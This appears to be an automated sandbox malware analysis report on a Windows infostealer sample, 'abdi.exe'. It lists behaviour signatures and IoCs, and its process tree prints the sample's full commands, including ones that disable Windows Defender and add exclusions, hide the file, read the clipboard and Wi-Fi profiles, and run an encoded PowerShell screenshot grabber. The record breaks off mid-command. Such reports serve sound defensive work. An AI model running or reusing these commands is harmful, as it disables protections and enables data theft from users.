2d8f268c9a0a66b6116ddb2a2584bff769b468e37b17178b698ab5a04d017841

Analysis

max time kernel
95s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 16:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

abdi.exe
Size

7.1MB
MD5

40e9e7d9da794c6c14d8359e53a70c52
SHA1

a6a28b0ec1b8a828ffd9e29fab3c336b88efc5b8
SHA256

2d8f268c9a0a66b6116ddb2a2584bff769b468e37b17178b698ab5a04d017841
SHA512

42ef4f998137a48dca0384a6adf1c5d04cf846c824ddb63444395605bd1865f7c7adc2162d9da829c76476b49adb485d56bd0802f0868c7cfa039904589866be
SSDEEP

98304:RDCIfhvpj8mlZMD/x/0feyGgatbQ940BDlgwdnpka9R/k9t+2SzIrzUGt+/tMFZA:RGOpjQDfyGgqwBdnpkYRMsc8SFtOoi

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4944	powershell.exe
3032	powershell.exe
716	powershell.exe
4924	powershell.exe
2840	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	abdi.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1360	cmd.exe
2624	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
652	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe
4020	abdi.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
23	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1860	tasklist.exe
1872	tasklist.exe
3024	tasklist.exe
2248	tasklist.exe
2316	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5100	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1568	cmd.exe
840	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4924	cmd.exe
1096	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3740	WMIC.exe
2896	WMIC.exe
1688	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2640	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
840	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
716	powershell.exe
4944	powershell.exe
716	powershell.exe
4944	powershell.exe
3032	powershell.exe
3032	powershell.exe
2624	powershell.exe
2624	powershell.exe
2624	powershell.exe
1768	powershell.exe
1768	powershell.exe
1768	powershell.exe
4924	powershell.exe
4924	powershell.exe
2624	powershell.exe
2624	powershell.exe
2840	powershell.exe
2840	powershell.exe
2504	powershell.exe
2504	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1860	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2184	WMIC.exe
Token: SeSecurityPrivilege	2184	WMIC.exe
Token: SeTakeOwnershipPrivilege	2184	WMIC.exe
Token: SeLoadDriverPrivilege	2184	WMIC.exe
Token: SeSystemProfilePrivilege	2184	WMIC.exe
Token: SeSystemtimePrivilege	2184	WMIC.exe
Token: SeProfSingleProcessPrivilege	2184	WMIC.exe
Token: SeIncBasePriorityPrivilege	2184	WMIC.exe
Token: SeCreatePagefilePrivilege	2184	WMIC.exe
Token: SeBackupPrivilege	2184	WMIC.exe
Token: SeRestorePrivilege	2184	WMIC.exe
Token: SeShutdownPrivilege	2184	WMIC.exe
Token: SeDebugPrivilege	2184	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2184	WMIC.exe
Token: SeRemoteShutdownPrivilege	2184	WMIC.exe
Token: SeUndockPrivilege	2184	WMIC.exe
Token: SeManageVolumePrivilege	2184	WMIC.exe
Token: 33	2184	WMIC.exe
Token: 34	2184	WMIC.exe
Token: 35	2184	WMIC.exe
Token: 36	2184	WMIC.exe
Token: SeDebugPrivilege	716	powershell.exe
Token: SeIncreaseQuotaPrivilege	2184	WMIC.exe
Token: SeSecurityPrivilege	2184	WMIC.exe
Token: SeTakeOwnershipPrivilege	2184	WMIC.exe
Token: SeLoadDriverPrivilege	2184	WMIC.exe
Token: SeSystemProfilePrivilege	2184	WMIC.exe
Token: SeSystemtimePrivilege	2184	WMIC.exe
Token: SeProfSingleProcessPrivilege	2184	WMIC.exe
Token: SeIncBasePriorityPrivilege	2184	WMIC.exe
Token: SeCreatePagefilePrivilege	2184	WMIC.exe
Token: SeBackupPrivilege	2184	WMIC.exe
Token: SeRestorePrivilege	2184	WMIC.exe
Token: SeShutdownPrivilege	2184	WMIC.exe
Token: SeDebugPrivilege	2184	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2184	WMIC.exe
Token: SeRemoteShutdownPrivilege	2184	WMIC.exe
Token: SeUndockPrivilege	2184	WMIC.exe
Token: SeManageVolumePrivilege	2184	WMIC.exe
Token: 33	2184	WMIC.exe
Token: 34	2184	WMIC.exe
Token: 35	2184	WMIC.exe
Token: 36	2184	WMIC.exe
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeIncreaseQuotaPrivilege	3740	WMIC.exe
Token: SeSecurityPrivilege	3740	WMIC.exe
Token: SeTakeOwnershipPrivilege	3740	WMIC.exe
Token: SeLoadDriverPrivilege	3740	WMIC.exe
Token: SeSystemProfilePrivilege	3740	WMIC.exe
Token: SeSystemtimePrivilege	3740	WMIC.exe
Token: SeProfSingleProcessPrivilege	3740	WMIC.exe
Token: SeIncBasePriorityPrivilege	3740	WMIC.exe
Token: SeCreatePagefilePrivilege	3740	WMIC.exe
Token: SeBackupPrivilege	3740	WMIC.exe
Token: SeRestorePrivilege	3740	WMIC.exe
Token: SeShutdownPrivilege	3740	WMIC.exe
Token: SeDebugPrivilege	3740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3740	WMIC.exe
Token: SeRemoteShutdownPrivilege	3740	WMIC.exe
Token: SeUndockPrivilege	3740	WMIC.exe
Token: SeManageVolumePrivilege	3740	WMIC.exe
Token: 33	3740	WMIC.exe
Token: 34	3740	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5096 wrote to memory of 4020	5096	abdi.exe	83
PID 5096 wrote to memory of 4020	5096	abdi.exe	83
PID 4020 wrote to memory of 2248	4020	abdi.exe	84
PID 4020 wrote to memory of 2248	4020	abdi.exe	84
PID 4020 wrote to memory of 4644	4020	abdi.exe	85
PID 4020 wrote to memory of 4644	4020	abdi.exe	85
PID 4020 wrote to memory of 1768	4020	abdi.exe	88
PID 4020 wrote to memory of 1768	4020	abdi.exe	88
PID 4020 wrote to memory of 1928	4020	abdi.exe	90
PID 4020 wrote to memory of 1928	4020	abdi.exe	90
PID 1768 wrote to memory of 1860	1768	cmd.exe	92
PID 1768 wrote to memory of 1860	1768	cmd.exe	92
PID 2248 wrote to memory of 4944	2248	cmd.exe	94
PID 2248 wrote to memory of 4944	2248	cmd.exe	94
PID 4644 wrote to memory of 716	4644	cmd.exe	93
PID 4644 wrote to memory of 716	4644	cmd.exe	93
PID 1928 wrote to memory of 2184	1928	cmd.exe	95
PID 1928 wrote to memory of 2184	1928	cmd.exe	95
PID 4020 wrote to memory of 4660	4020	abdi.exe	97
PID 4020 wrote to memory of 4660	4020	abdi.exe	97
PID 4660 wrote to memory of 1932	4660	cmd.exe	99
PID 4660 wrote to memory of 1932	4660	cmd.exe	99
PID 4020 wrote to memory of 2472	4020	abdi.exe	100
PID 4020 wrote to memory of 2472	4020	abdi.exe	100
PID 2472 wrote to memory of 2620	2472	cmd.exe	102
PID 2472 wrote to memory of 2620	2472	cmd.exe	102
PID 4020 wrote to memory of 2764	4020	abdi.exe	103
PID 4020 wrote to memory of 2764	4020	abdi.exe	103
PID 2764 wrote to memory of 3740	2764	cmd.exe	105
PID 2764 wrote to memory of 3740	2764	cmd.exe	105
PID 4020 wrote to memory of 428	4020	abdi.exe	106
PID 4020 wrote to memory of 428	4020	abdi.exe	106
PID 428 wrote to memory of 2896	428	cmd.exe	108
PID 428 wrote to memory of 2896	428	cmd.exe	108
PID 4020 wrote to memory of 5100	4020	abdi.exe	109
PID 4020 wrote to memory of 5100	4020	abdi.exe	109
PID 4020 wrote to memory of 3180	4020	abdi.exe	111
PID 4020 wrote to memory of 3180	4020	abdi.exe	111
PID 5100 wrote to memory of 3560	5100	cmd.exe	154
PID 5100 wrote to memory of 3560	5100	cmd.exe	154
PID 3180 wrote to memory of 3032	3180	cmd.exe	114
PID 3180 wrote to memory of 3032	3180	cmd.exe	114
PID 4020 wrote to memory of 1060	4020	abdi.exe	115
PID 4020 wrote to memory of 1060	4020	abdi.exe	115
PID 4020 wrote to memory of 2388	4020	abdi.exe	116
PID 4020 wrote to memory of 2388	4020	abdi.exe	116
PID 4020 wrote to memory of 2280	4020	abdi.exe	119
PID 4020 wrote to memory of 2280	4020	abdi.exe	119
PID 2388 wrote to memory of 3024	2388	cmd.exe	121
PID 2388 wrote to memory of 3024	2388	cmd.exe	121
PID 4020 wrote to memory of 1444	4020	abdi.exe	124
PID 4020 wrote to memory of 1444	4020	abdi.exe	124
PID 1060 wrote to memory of 1872	1060	cmd.exe	122
PID 1060 wrote to memory of 1872	1060	cmd.exe	122
PID 4020 wrote to memory of 1360	4020	abdi.exe	123
PID 4020 wrote to memory of 1360	4020	abdi.exe	123
PID 2280 wrote to memory of 2020	2280	cmd.exe	125
PID 2280 wrote to memory of 2020	2280	cmd.exe	125
PID 4020 wrote to memory of 4584	4020	abdi.exe	126
PID 4020 wrote to memory of 4584	4020	abdi.exe	126
PID 4020 wrote to memory of 4924	4020	abdi.exe	173
PID 4020 wrote to memory of 4924	4020	abdi.exe	173
PID 4020 wrote to memory of 1780	4020	abdi.exe	132
PID 4020 wrote to memory of 1780	4020	abdi.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3560	attrib.exe
1412	attrib.exe
4616	attrib.exe

C:\Users\Admin\AppData\Local\Temp\abdi.exe
"C:\Users\Admin\AppData\Local\Temp\abdi.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5096
- C:\Users\Admin\AppData\Local\Temp\abdi.exe
  "C:\Users\Admin\AppData\Local\Temp\abdi.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\abdi.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\abdi.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\abdi.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\abdi.exe"
      4⤵
      Views/modifies file attributes
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏ ‌‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏ ‌‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1060
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2280
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1444
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4924
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1780
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3760
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjA